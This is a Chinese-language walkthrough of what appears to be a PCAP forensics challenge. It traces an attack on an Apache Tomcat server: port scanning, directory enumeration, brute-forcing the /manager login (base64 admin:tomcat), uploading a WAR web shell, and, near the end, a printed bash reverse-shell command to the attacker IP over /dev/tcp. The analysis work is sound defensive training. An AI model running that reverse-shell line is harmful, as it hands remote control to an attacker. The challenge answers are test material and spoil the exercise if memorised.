題干：

我們的 SOC 團(tuán)隊(duì)在公司內(nèi)部網(wǎng)的一臺(tái) Web 服務(wù)器上檢測(cè)到可疑活動(dòng)。為了更深入地了解情況，團(tuán)隊(duì)捕獲了網(wǎng)絡(luò)流量進(jìn)行分析。此 pcap 文件可能包含一系列惡意活動(dòng)，這些活動(dòng)已導(dǎo)致 Apache Tomcat Web 服務(wù)器遭到破壞。我們需要進(jìn)一步調(diào)查這一事件。

鑒于在 Web 服務(wù)器上檢測(cè)到的可疑活動(dòng)，pcap數(shù)據(jù)包顯示服務(wù)存在跨端口請(qǐng)求，這表明存在潛在的掃描行為。您能否確定在我們的服務(wù)器上發(fā)起這些請(qǐng)求的源 IP 地址？

使用wireshark工具直接打開下載好的pcap數(shù)據(jù)包，然后根據(jù)端口大小進(jìn)行排序，我們發(fā)現(xiàn)14.0.0.120 對(duì) 10.0.0.112 設(shè)備從23端口開始進(jìn)行遞歸探測(cè)

所以此題的答案為14.0.0.120

根據(jù)與攻擊者關(guān)聯(lián)的已識(shí)別 IP 地址，您能否確定攻擊者活動(dòng)起源于哪個(gè)城市？

因?yàn)檫@個(gè)題目是歪果仁出的，所以不建議使用國(guó)內(nèi)的ip地址查詢，使用國(guó)外的，否則答案就是錯(cuò)的

Pcap數(shù)據(jù)包中的端口中的哪一個(gè)提供對(duì) Web 服務(wù)器管理面板的訪問？

很顯然，真相只有一個(gè)，那就是8080

攻擊者在我們的服務(wù)器上發(fā)現(xiàn)開放端口后，似乎試圖枚舉我們 Web 服務(wù)器上的目錄和文件。您可以從分析中識(shí)別出攻擊者使用的工具是什么嗎？

竟然是枚舉目錄，那我們直接找404

隨便選一個(gè)，進(jìn)行http追蹤

特征已經(jīng)很明顯了，雖然不知道這個(gè)工具是啥，但是確定就是他了

在他們枚舉 Web 服務(wù)器上的目錄之后，攻擊者發(fā)出了大量請(qǐng)求，試圖識(shí)別管理界面。攻擊者發(fā)現(xiàn)了與管理面板關(guān)聯(lián)的哪個(gè)特定目錄？

這道題其實(shí)承上啟下，人家問的是與管理面板關(guān)聯(lián)的目錄，所以我們不能光看200請(qǐng)求碼，還需要看有登錄標(biāo)識(shí)的

很顯然，是manager

訪問管理面板后，攻擊者試圖暴力破解登錄憑據(jù)。從數(shù)據(jù)中，您能否識(shí)別出攻擊者成功用于授權(quán)的正確用戶名和密碼組合？

直接找到最后一個(gè)401的下一個(gè)數(shù)據(jù)包就行

追蹤流

YWRtaW46dG9tY2F0
使用葵爺進(jìn)行base64解碼

進(jìn)入管理面板，攻擊者試圖上傳文件，意圖建立反向 shell。您能從捕獲的數(shù)據(jù)中識(shí)別出此惡意文件的名稱嗎？

直接找上傳數(shù)據(jù)包

追蹤流

好好好，war包上傳getshell是吧
JXQOZY.war

在我們的服務(wù)器上成功建立反向 shell 后，攻擊者旨在確保受感染機(jī)器上的持久性。從分析中，您能否確定它們計(jì)劃運(yùn)行的特定命令是什么嗎？

這里就不能追蹤http請(qǐng)求了，我們需要回到最初始的狀態(tài)，直接找getshell成功后，第一次訪問這個(gè)shell的后面的數(shù)據(jù)包

為啥看這個(gè)呢，因?yàn)?080war包上傳后最后通過shell控制的當(dāng)然還是80端口

結(jié)果顯而易見
/bin/bash -c ‘bash -i >& /dev/tcp/14.0.0.120/443 0>&1’

so easy